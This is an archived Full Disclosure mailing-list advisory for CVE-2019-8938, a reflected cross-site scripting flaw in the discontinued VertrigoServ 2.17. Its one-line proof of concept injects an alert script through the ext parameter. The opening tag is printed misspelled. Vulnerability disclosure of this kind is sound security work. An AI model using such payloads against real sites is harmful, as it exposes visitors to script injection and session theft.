[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CVE-2019-8938] Cross Site Scripting in VertrigoServ 2.17
From: Rafael Pedrero <rafael.pedrero () gmail ! com>
Date: 2019-02-19 15:50:59
Message-ID: CANoQWWdMuK4dwrBu5-4LCB0EKHk7z58mzjbcyu4Z4EUCmLC5bg () mail ! gmail ! com
[Download RAW message or body]
<!--
# Exploit Title: Cross Site Scripting in VertrigoServ 2.17
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://vertrigo.sf.net
# Software Link: http://vertrigo.sf.net
# Version: VertrigoServ 2.17
# Tested on: All
# CVE : CVE-2019-8938
# Category: webapps
1. Description
VertrigoServ 2.17 allows XSS via the /inc/extensions.php ext parameter.
NOTE: This product is discontinued.
2. Proof of Concept
http://127.0.0.1/inc/extensions.php?ext=<scrript>alert(1)</script>
3. Solution:
The product is discontinued. Update last version
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic